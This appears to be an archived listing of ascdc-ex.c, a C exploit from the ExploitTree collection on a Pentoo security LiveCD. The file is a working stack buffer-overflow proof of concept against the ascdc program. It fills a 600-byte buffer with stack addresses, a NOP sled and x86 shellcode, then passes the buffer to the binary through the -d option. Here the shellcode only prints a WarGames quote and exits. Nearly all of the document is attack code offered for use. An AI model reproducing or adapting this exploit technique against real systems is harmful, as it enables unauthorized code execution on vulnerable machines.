home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / ascd / ascdc-ex.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  826 b   |  33 lines
  1. char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
  2.            "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
  3.            "\x01\xcd\x80\xe8\xe6\xff\xff\xff"
  4.            "Would you like to play a game? y\x0aStrange, the only winning
  5. move is not to play.\x0a";
  6. #define bsize 600
  7. unsigned long get_sp(void) {
  8.    __asm__("movl %esp,%eax");
  9. }
  10.  
  11. main(int argc, char *argv[]) {
  12.   char *buff, *ptr;
  13.   long *addr_ptr, addr;
  14.   int i;
  15.   buff = malloc(bsize);
  16.  
  17.   addr = get_sp();
  18.   ptr = buff;
  19.   addr_ptr = (long *) ptr;
  20.   for (i = 0; i < bsize; i+=4)
  21.     *(addr_ptr++) = addr;
  22.  
  23.   for (i = 0; i < 600/2; i++)
  24.     buff[i] = 0x90;
  25.  
  26.   ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  27.   for (i = 0; i < strlen(shellcode); i++)
  28.     *(ptr++) = shellcode[i];
  29.     buff[bsize - 1] = '\0';
  30.  execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0);
  31.  
  32. }
  33.